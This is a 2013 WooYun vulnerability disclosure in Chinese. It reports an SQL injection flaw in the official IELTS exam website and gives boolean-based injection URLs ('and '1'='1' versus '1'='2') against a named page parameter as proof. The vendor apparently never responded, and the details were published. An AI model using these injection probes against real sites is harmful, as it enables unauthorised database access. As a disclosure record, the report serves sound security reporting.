漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-023776
漏洞标题:IELTS雅思考试官方网站
相关厂商:IELTS 雅思考试官方网站
漏洞作者: 季煜熙
提交时间:2013-05-16 14:33
修复时间:2013-06-30 14:33
公开时间:2013-06-30 14:33
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:8
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-05-16: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-06-30: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
明天准备考雅思,就在考试前来发一则IELTS 雅思考试官方网站存在注入漏洞吧。。并求保佑明天考到好成绩。。
详细说明:
IELTS 雅思考试官方网站存在注入漏洞
http://ielts.etest.edu.cn/cn/?DocName=News20121214c&__id=AppMain.dsaNews.ShowNews
输入http://ielts.etest.edu.cn/cn/?DocName=News20121214c' and '1'='1&__id=AppMain.dsaNews.ShowNews
就能显示
输入http://ielts.etest.edu.cn/cn/?DocName=News20121214c' and '1'='2&__id=AppMain.dsaNews.ShowNews
就不能显示
漏洞证明:
IELTS 雅思考试官方网站存在注入漏洞
http://ielts.etest.edu.cn/cn/?DocName=News20121214c&__id=AppMain.dsaNews.ShowNews
输入http://ielts.etest.edu.cn/cn/?DocName=News20121214c' and '1'='1&__id=AppMain.dsaNews.ShowNews
就能显示
输入http://ielts.etest.edu.cn/cn/?DocName=News20121214c' and '1'='2&__id=AppMain.dsaNews.ShowNews
就不能显示
修复方案:
过滤掉敏感字符。。你们懂的
版权声明:转载请注明来源 季煜熙@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝